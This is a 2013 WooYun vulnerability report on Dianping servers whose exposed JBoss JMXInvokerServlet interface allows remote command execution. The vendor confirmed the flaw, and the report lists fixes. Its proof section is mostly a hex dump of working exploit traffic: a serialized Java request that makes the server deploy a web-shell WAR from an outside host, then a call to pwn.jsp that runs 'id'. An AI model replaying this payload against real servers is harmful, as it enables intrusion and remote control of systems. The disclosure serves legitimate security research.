当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039513

漏洞标题:大众点评多台服务器中间件配置不当 可命令执行

相关厂商:大众点评

漏洞作者: 猪猪侠

提交时间:2013-10-12 17:12

修复时间:2013-11-26 17:12

公开时间:2013-11-26 17:12

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-12: 细节已通知厂商并且等待厂商处理中
2013-10-12: 厂商已经确认,细节仅向厂商公开
2013-10-22: 细节向核心白帽子及相关领域专家公开
2013-11-01: 细节向普通白帽子公开
2013-11-11: 细节向实习白帽子公开
2013-11-26: 细节向公众公开

简要描述:

中间件做了一些安全加固,删除了一些对安全有影响的组件,但有部分漏洞被忽视。

详细说明:

Jboss 最新0day来袭,多台服务器受影响
http://180.153.132.91/invoker/JMXInvokerServlet/
http://180.153.132.107/invoker/JMXInvokerServlet/
http://180.153.132.249/invoker/JMXInvokerServlet/
大众点评网的管理员针对JBOSS,删除了web-console,jmx-console,但部署业务的invoker/JMXInvokerServlet接口未处理,导致可直接远程命令执行,且部署SHELL。

漏洞证明:

PS E:\AppServ\php5> .\php.exe .\jboss.php 180.153.132.91 id
PHP Warning:  Module 'mbstring' already loaded in Unknown on line 0
     0 : 50 4f 53 54 20 2f 69 6e 76 6f 6b 65 72 2f 45 4a [POST /invoker/EJ]
    10 : 42 49 6e 76 6f 6b 65 72 53 65 72 76 6c 65 74 2f [BInvokerServlet/]
    20 : 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 74 65 [ HTTP/1.1..Conte]
    30 : 6e 74 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [ntType: applicat]
    40 : 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 61 [ion/x-java-seria]
    50 : 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 6c [lized-object; cl]
    60 : 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [ass=org.jboss.in]
    70 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
    80 : 6c 65 64 49 6e 76 6f 63 61 74 69 6f 6e 0d 0a 41 [ledInvocation..A]
    90 : 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 [ccept-Encoding: ]
    A0 : 78 2d 67 7a 69 70 2c 78 2d 64 65 66 6c 61 74 65 [x-gzip,x-deflate]
    B0 : 2c 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 55 [,gzip,deflate..U]
    C0 : 73 65 72 2d 41 67 65 6e 74 3a 20 4a 61 76 61 2f [ser-Agent: Java/]
    D0 : 31 2e 36 2e 30 5f 32 31 0d 0a 48 6f 73 74 3a 20 [1.6.0_21..Host: ]
    E0 : 31 38 30 2e 31 35 33 2e 31 33 32 2e 39 31 3a 38 [180.153.132.91:8]
    F0 : 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f [0..Accept: text/]
   100 : 68 74 6d 6c 2c 20 69 6d 61 67 65 2f 67 69 66 2c [html, image/gif,]
   110 : 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 2a 3b 20 [ image/jpeg, *; ]
   120 : 71 3d 2e 32 2c 20 2a 2f 2a 3b 20 71 3d 2e 32 0d [q=.2, */*; q=.2.]
   130 : 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 [.Connection: kee]
   140 : 70 2d 61 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 [p-alive..Content]
   150 : 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 [-type: applicati]
   160 : 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 [on/x-www-form-ur]
   170 : 6c 65 6e 63 6f 64 65 64 0d 0a 43 6f 6e 74 65 6e [lencoded..Conten]
   180 : 74 2d 4c 65 6e 67 74 68 3a 20 37 33 32 0d 0a 0d [t-Length: 732...]
   190 : 0a ac ed 00 05 73 72 00 29 6f 72 67 2e 6a 62 6f [.....sr.)org.jbo]
   1A0 : 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 4d 61 [ss.invocation.Ma]
   1B0 : 72 73 68 61 6c 6c 65 64 49 6e 76 6f 63 61 74 69 [rshalledInvocati]
   1C0 : 6f 6e f6 06 95 27 41 3e a4 be 0c 00 00 78 70 70 [on...'A>.....xpp]
   1D0 : 77 08 78 94 98 47 c1 d0 53 87 73 72 00 11 6a 61 [w.x..G..S.sr..ja]
   1E0 : 76 61 2e 6c 61 6e 67 2e 49 6e 74 65 67 65 72 12 [va.lang.Integer.]
   1F0 : e2 a0 a4 f7 81 87 38 02 00 01 49 00 05 76 61 6c [......8...I..val]
   200 : 75 65 78 72 00 10 6a 61 76 61 2e 6c 61 6e 67 2e [uexr..java.lang.]
   210 : 4e 75 6d 62 65 72 86 ac 95 1d 0b 94 e0 8b 02 00 [Number..........]
   220 : 00 78 70 26 95 be 0a 73 72 00 24 6f 72 67 2e 6a [.xp&...sr.$org.j]
   230 : 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e [boss.invocation.]
   240 : 4d 61 72 73 68 61 6c 6c 65 64 56 61 6c 75 65 ea [MarshalledValue.]
   250 : cc e0 d1 f4 4a d0 99 0c 00 00 78 70 77 f0 00 00 [....J.....xpw...]
   260 : 00 e8 ac ed 00 05 75 72 00 13 5b 4c 6a 61 76 61 [......ur..[Ljava]
   270 : 2e 6c 61 6e 67 2e 4f 62 6a 65 63 74 3b 90 ce 58 [.lang.Object;..X]
   280 : 9f 10 73 29 6c 02 00 00 78 70 00 00 00 04 73 72 [..s)l...xp....sr]
   290 : 00 1b 6a 61 76 61 78 2e 6d 61 6e 61 67 65 6d 65 [..javax.manageme]
   2A0 : 6e 74 2e 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 a7 [nt.ObjectName...]
   2B0 : 1b eb 6d 15 cf 03 00 00 78 70 74 00 21 6a 62 6f [..m.....xpt.!jbo]
   2C0 : 73 73 2e 73 79 73 74 65 6d 3a 73 65 72 76 69 63 [ss.system:servic]
   2D0 : 65 3d 4d 61 69 6e 44 65 70 6c 6f 79 65 72 78 74 [e=MainDeployerxt]
   2E0 : 00 06 64 65 70 6c 6f 79 75 71 00 7e 00 00 00 00 [..deployuq.~....]
   2F0 : 00 01 74 00 1a 68 74 74 70 3a 2f 2f 35 39 2e 33 [..t..http://59.3]
   300 : 39 2e 37 31 2e 32 30 37 2f 61 2e 77 61 72 3f 75 [9.71.207/a.war?u]
   310 : 72 00 13 5b 4c 6a 61 76 61 2e 6c 61 6e 67 2e 53 [r..[Ljava.lang.S]
   320 : 74 72 69 6e 67 3b ad d2 56 e7 e9 1d 7b 47 02 00 [tring;..V...{G..]
   330 : 00 78 70 00 00 00 01 74 00 10 6a 61 76 61 2e 6c [.xp....t..java.l]
   340 : 61 6e 67 2e 53 74 72 69 6e 67 0d d3 be c9 78 77 [ang.String....xw]
   350 : 04 00 00 00 01 73 72 00 22 6f 72 67 2e 6a 62 6f [.....sr."org.jbo]
   360 : 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 49 6e [ss.invocation.In]
   370 : 76 6f 63 61 74 69 6f 6e 4b 65 79 b8 fb 72 84 d7 [vocationKey..r..]
   380 : 93 85 f9 02 00 01 49 00 07 6f 72 64 69 6e 61 6c [......I..ordinal]
   390 : 78 70 00 00 00 05 73 71 00 7e 00 05 77 0d 00 00 [xp....sq.~..w...]
   3A0 : 00 05 ac ed 00 05 70 fb 57 a7 aa 78 77 04 00 00 [......p.W..xw...]
   3B0 : 00 03 73 71 00 7e 00 07 00 00 00 04 73 72 00 23 [..sq.~......sr.#]
   3C0 : 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 [org.jboss.invoca]
   3D0 : 74 69 6f 6e 2e 49 6e 76 6f 63 61 74 69 6f 6e 54 [tion.InvocationT]
   3E0 : 79 70 65 59 a7 3a 1c a5 2b 7c bf 02 00 01 49 00 [ypeY.:..+|....I.]
   3F0 : 07 6f 72 64 69 6e 61 6c 78 70 00 00 00 01 73 71 [.ordinalxp....sq]
   400 : 00 7e 00 07 00 00 00 0a 70 74 00 0f 4a 4d 58 5f [.~......pt..JMX_]
   410 : 4f 42 4a 45 43 54 5f 4e 41 4d 45 73 72 00 1b 6a [OBJECT_NAMEsr..j]
   420 : 61 76 61 78 2e 6d 61 6e 61 67 65 6d 65 6e 74 2e [avax.management.]
   430 : 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 a7 1b eb 6d [ObjectName.....m]
   440 : 15 cf 03 00 00 78 70 74 00 21 6a 62 6f 73 73 2e [.....xpt.!jboss.]
   450 : 73 79 73 74 65 6d 3a 73 65 72 76 69 63 65 3d 4d [system:service=M]
   460 : 61 69 6e 44 65 70 6c 6f 79 65 72 78 78 [ainDeployerxx]
     0 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d [HTTP/1.1 200 OK.]
    10 : 0a 53 65 72 76 65 72 3a 20 44 50 20 57 65 62 20 [.Server: DP Web ]
    20 : 32 2e 30 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 [2.0..Date: Sat, ]
    30 : 31 32 20 4f 63 74 20 32 30 31 33 20 30 39 3a 30 [12 Oct 2013 09:0]
    40 : 37 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e [7:40 GMT..Conten]
    50 : 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [t-Type: applicat]
    60 : 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 61 [ion/x-java-seria]
    70 : 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 6c [lized-object; cl]
    80 : 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [ass=org.jboss.in]
    90 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
    A0 : 6c 65 64 56 61 6c 75 65 0d 0a 54 72 61 6e 73 66 [ledValue..Transf]
    B0 : 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 [er-Encoding: chu]
    C0 : 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e [nked..Connection]
    D0 : 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 4b 65 [: keep-alive..Ke]
    E0 : 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 [ep-Alive: timeou]
    F0 : 74 3d 35 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 [t=5..X-Powered-B]
   100 : 79 3a 20 53 65 72 76 6c 65 74 20 32 2e 34 3b 20 [y: Servlet 2.4; ]
   110 : 4a 42 6f 73 73 2d 34 2e 32 2e 32 2e 47 41 20 28 [JBoss-4.2.2.GA (]
   120 : 62 75 69 6c 64 3a 20 53 56 4e 54 61 67 3d 4a 42 [build: SVNTag=JB]
   130 : 6f 73 73 5f 34 5f 32 5f 32 5f 47 41 20 64 61 74 [oss_4_2_2_GA dat]
   140 : 65 3d 32 30 30 37 31 30 32 32 31 31 33 39 29 2f [e=200710221139)/]
   150 : 54 6f 6d 63 61 74 2d 35 2e 35 0d 0a 0d 0a 34 39 [Tomcat-5.5....49]
   160 : 0d 0a ac ed 00 05 73 72 00 24 6f 72 67 2e 6a 62 [......sr.$org.jb]
   170 : 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 4d [oss.invocation.M]
   180 : 61 72 73 68 61 6c 6c 65 64 56 61 6c 75 65 ea cc [arshalledValue..]
   190 : e0 d1 f4 4a d0 99 0c 00 00 78 70 77 0d 00 00 00 [...J.....xpw....]
   1A0 : 05 ac ed 00 05 70 fb 57 a7 aa 78 0d 0a 30 0d 0a [.....p.W..x..0..]
   1B0 : 0d 0a [..]
     0 : 47 45 54 20 2f 61 2f 70 77 6e 2e 6a 73 70 3f 63 [GET /a/pwn.jsp?c]
    10 : 6d 64 3d 69 64 20 48 54 54 50 2f 31 2e 30 0d 0a [md=id HTTP/1.0..]
    20 : 48 6f 73 74 3a 20 31 38 30 2e 31 35 33 2e 31 33 [Host: 180.153.13]
    30 : 32 2e 39 31 3a 38 30 0d 0a 43 6f 6e 6e 65 63 74 [2.91:80..Connect]
    40 : 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a [ion: Close....]
HTTP/1.1 200 OK
Server: DP Web 2.0
Date: Sat, 12 Oct 2013 09:07:46 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 52
Connection: close
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=FE56D8D4085F61D6BE5693642DA7163F; Path=/
uid=99(nobody) gid=99(nobody) groups=99(nobody)

修复方案:

# 删除接口
# 设置中间件的访问控制权限,禁止web访问 /invoker 目录

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-10-12 17:59

厂商回复:

确实有个别服务器存在

最新状态:

暂无